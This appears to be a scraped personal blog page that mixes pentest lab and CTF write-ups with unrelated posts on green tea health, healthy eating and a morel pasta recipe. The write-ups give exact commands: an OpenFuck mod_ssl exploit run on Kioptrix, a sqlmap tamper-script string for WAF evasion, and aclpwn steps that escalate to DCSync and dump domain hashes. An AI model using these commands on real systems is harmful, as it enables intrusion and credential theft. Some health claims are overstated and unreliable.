I just finished an amazing hacking course by TheCyberMentor on udemy. It’s a great deal and provides a really practical introduction to pentesting by a professional. I highly recommend it. Woot!
I’m taking The Cyber Mentor’s Practical Ethical Hacking Course on Udemy and during the scanning and enumeration chapter, we started scanning Kioptrix Level 1. I’ve played around with Kioptrix before and was already prepared to root the machine in a quick two-step, even though that’s not part of the section. To do this root, you’ll need a VMware player to run Kioptrix level one, which you can download from VulnHub. Get it running and find the IP address. I had a little difficulty with this as I couldn’t just pick it up with netdiscover on my network and had to do an nmap ping scan to discover hosts on my vmnet8 interface rather than my local network. Once I had the IP I poked around a bit, looked at the default webpage the server was hosting, ran dirbuster etc, but really got into it running nikto. Although an nmap scan showed an smb share hanging out, which is usually where I’d start probing, nikto showed this:
Wait what? I can pop a shell? Let’s look up the vuln.
Evidently these are way way way outdated versions of Apache and mod_ssl with a vuln that goes back to 2002. Also this sounds familiar. I’ve already exploited this on a box somewhere and have the exploit on my Kali box. For whatever reason this isn’t already implemented in metasploit, but exploit code is available on Exploit-DB and its called OpenFuck Classy I know. It’s in C and needs to be compiled with gcc to run, but I already had it from the last time I used it. ./OpenFuck 0x6b 172.16.XXX.XXX 443 -c 40 and what do I get?
Well I’m root already, no pivoting or privesc, just an easy rooted box. While I’m here I better grab some treasure.
Just a small note related to sqlmap culled from working on a CTF style challenge. Not all the tamper scripts in jhaddix’s helpful attack string are still working. Current working command:
sqlmap -u http://192.168.1.1 –level=5 –risk=3 -a –text-only –technique=BU –tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,randomcomments,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords –random-agent
On a recent hacking challenge I was presented with a privesc scenario where I had already compromised a low privileged user with the tools available in Impacket. The user (a service account) had access to winrm and therefore had a semi-functional shell but no access to rdp or smb shares. The network had a default installation of Exchange server, which opens up some avenues for privesc, thanks to the research of dirkjanm and his tool aclpwn.py aclpwn.py uses BloodHound an ActiveDirectory graphing tool to identify paths and exploitation routes on a domain and easily identifies the shortest path from any user to domain admin. aclpwn uses this graph and low level credentials to abuse group memberships created by exchange, specifically the Exchange Windows Permissions group, which for some reason has writedacl privileges in active directory environments. Now my compromised service account wasn’t part of the group and had no write dacl permissions, but could under it’s own authority, create a new user and add it to the necessary group. After bashing the keyboard repeatedly trying to find a way to access the domain with this user, enter aclpwn. Usage is simple. On kali, pip install aclpwn.
aclpwn -f <target> -ft <target-type i.e. user | computer > -d <domain>
You need your BloodHound instance running, and may need to supply it’s credentials
aclpwn -f <target> -ft <target-type i.e. user | computer > -d testsegment.local -du <database user>-dp <database password>
Bang, automatically add your user full privileges to DCSync any or all accounts on the domain. Domain Admin hashes, dumped with impacket , easy-peasy privesc.
By McKay Savage from London, UK [CC-BY-2.0 (http://creativecommons.org/licenses/by/2.0)], via Wikimedia CommonsGreen Tea may be the most beneficial addition to any and all holistic health regimens. It is certainly one of the easiest to add into a daily routine, and has been clinically proven to improve health in normal drinking concentrations. This superfood (or beverage) packs a wallop of anti-oxidants, as well as producing a number of health benefits outside the standard anti-cancer properties of fruits and vegetables.
It is a brain booster. The well known stimulant in tea, caffeine, has brain tonic effects, and can aid in focus, concentration, and energy. The lower doses of caffeine and combination with L-theanine an amino acid, can produce a mellow and relaxed buzz when compared to the jittery effects of coffee. L-theanine also stimulates the neurotransmitter GABA and can increase dopamine levels as well.
Green tea fights cancer. Whether through anti-oxidants or through interactions of the complex chemistry of brewed tea leaves, studies have repeatedly shown that regular drinkers of green tea get less cancer. This is probably one of the main reasons that tea drinking spread through Asia and tea’s reputation there as a longevity elixir.
Fat burning. While not all metabolism studies agree at this point, some have found clear increase in energy production, with increased metabolism. What sets green tea apart in these studies is evidence that fat metabolism specifically accounts for most of the increase in energy.
It kills bacteria and freshens breath. Tea has natural antibiotic properties which begin at the mouth and can pass through the digestive system and urinary tract. Green tea preparations have been used for centuries in Chinese medicine for their antiseptic properties.
Heart Attack and Stroke. There is evidence that catechins in green teas, lowers cholesterol, especially LDL, so-called “bad” cholesterol. High cholesterol levels are definitely related to cardiovascular disease, and a cup of green tea is an easy addition to help lower risk factors.
Blood Sugar and Diabetes. Tea consumption has been associated with a significantly lower risk of type 2 diabetes, alas, only for heavy tea drinkers. For normal consumers though tea can help lower blood sugar and increase sensitivity to naturally produced insulin, making the disease more manageable.
For more information on the amazing benefits of green tea, check out this great article at Authority Nutrition, which includes lots of links to original studies, and details on some of the healthy compunds in tea.
Good food can heal. This is something we are all aware of instinctively, though we may not be able to describe how or why. The definitions of good food can vary as well, over time, across cultures, or dependent on mood and situation. What is even less clear, is what is bad food? What in our diet is making us ill, or at least contributing to the illness process. These answers are rarely simple, but newer developments in medical science are leading us in the right direction. According to recent, well-documented, medical reports, Stress and Inflammation, are the real culprits when looking at disease process. From diabetes, to stroke, heart attack and cancer, diseases attack the parts of the body damaged by stress and inflammation. Diet can exacerbate or even cause these bodily stresses, and lead to overall poor health, ruining our quality of life. And while an ounce of prevention is worth a pound of cure, dietary changes, and a focus on our food philosophy, can help reverse years of unhealthy diet and lifestyle choices. These changes aren’t miraculous, though the results might seem to be. Like most lifestyle changes the results add up slowly overtime, and are proven by a long and healthy life.
A healing food philosophy starts with the realization that some parts of our food systems, and therefore our own diets are sick. Identifying individual culprits is difficult, so making small changes regularly towards the long term goal of health, is easier than a radical food revolution in your own kitchen. Think about foods, that you know are healthy for you personally, and try to include more of them in your diet. Start cutting out obvious problem foods as you can, but a positive focus on enjoyable meals helps reinforce good choices. Food production and preparation affect the food before you eat it. Despite all the media confusion about gmo’s and pesticides/fertilizers etc… it doesn’t make sense to put any more poison in your body than you have to. Whether these are small traces or not, why buy pre-poisoned food if organic is available? Add fresh foods and whole foods. Fresh foods taste better, are more vital, and force you to know what you are eating. They don’t have long lists of unpronounceable “ingredients,” and are generally what separates a good meal from a mediocre one. A big step for most of us is…Start Cooking More Often. It’s hard to wean oneself from convenience, but home cooked food is easier to control, at least, and may become the foundation of a whole healthy lifestyle. Eat with loved ones. Have family meals, throw potlucks, have dinner parties. Wholesome food prepared lovingly is one of the greatest gifts we can give to people we care about. Healing with food is a social endeavor. A positive social environment lowers stress, and increases the enjoyment of the food prepared. Have fun with it. Epicurus, the philosopher pictured above noted that enjoyment of food was inherently hedonistic, and yet necessary for the preservation of life. The enjoyment of good food, even fatty/high calorie/or otherwise “naughty” foods, can contribute to health in myriad ways, if part of a conscious lifestyle of wellness and positive choices.
Love them or (maybe) hate them, mushrooms have been renowned for centuries around the world for their flavor, beauty and health benefits. In Asia, varieties like reishi and maitake are valued for their contribution to longevity, while in the Occidental West, Morels, Truffles and even the lowly Crimini are being touted for everything from a blood pressure cure to anti-cancer wonder foods. While some finicky eaters may complain about the flavor or, more likely, the texture of mushrooms, with proper preparation even strongly flavored mushrooms can be added to familiar dishes, and become a staple of the home pantry.
Some unfamiliar mushrooms can cause intestinal distress upon first encounter, so it is usually wise to introduce them into diet slowly. In addition, making sure they are well cooked, can minimize the negative impacts on digestion, and often wild-mushrooms should be par-boiled before use.
One signature dish I have used for years to introduce people to Morel mushrooms is a simple Linguini with Morel Cream Sauce. It is always served to rave reviews, and in fact I have had friends tell me they actually dream about this dish in springtime, when the mushroom hunting season begins.
To begin this dish I start with about one pound of very fresh morels, which have been soaked in water to remove any forest duff or six-legged guests. These are drained and sliced into bite sized pieces. Along with one or two medium sized shallots sliced into a thin julienne. The shallots are sauteed in butter until translucent, then the mushrooms added and cooked until they begin to crisp and all liquid is reduced in the pan. Add two tablespoons of dry sherry and reduce again. Then add two cups of heavy cream. Let the whole sauce reduce over a very low simmer until the thickness can coat the back of a clean spoon, then finish with salt, a pinch of white pepper, and another small pinch of nutmeg. Serve over any favorite prepared pasta.
The long caramelization of shallot and mushroom in this dish contribute a deep earthy flavor, and the texture of the small morel pieces please even avowed mushroom haters.
Often, individuals who dislike mushrooms at first offer, can be won over by simply sauteing any mushrooms in butter and garlic until crispy and served over steaks or added to sauces. The crispness and garlicky goodness overcoming previous experiences of soggy, bland mushroom dishes. Otherwise, a long marinade in any vinaigrette before cooking, can improve the flavor enough to win over the haters.
We use cookies on our website to give you the most relevant experience by remembering your preferences and repeat visits. By clicking “Accept”, you consent to the use of ALL the cookies.
This website uses cookies to improve your experience while you navigate through the website. Out of these cookies, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities of the website. We also use third-party cookies that help us analyze and understand how you use this website. These cookies will be stored in your browser only with your consent. You also have the option to opt-out of these cookies. But opting out of some of these cookies may have an effect on your browsing experience.
Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.
Well I’m root already, no pivoting or privesc, just an easy rooted box. While I’m here I better grab some treasure.
Hashes to crack for later! Fun!
![By McKay Savage from London, UK [CC-BY-2.0 (http://creativecommons.org/licenses/by/2.0)], via Wikimedia Commons](https://unv.fgu.temporary.site/wp-content/uploads/2014/02/800px-China_-_Chengdu_22_-_green_tea_140902695-300x225.jpg)
![By McKay Savage from London, UK [CC-BY-2.0 (http://creativecommons.org/licenses/by/2.0)], via Wikimedia Commons](https://unv.fgu.temporary.site/wp-content/uploads/2014/02/800px-China_-_Chengdu_22_-_green_tea_140902695.jpg)
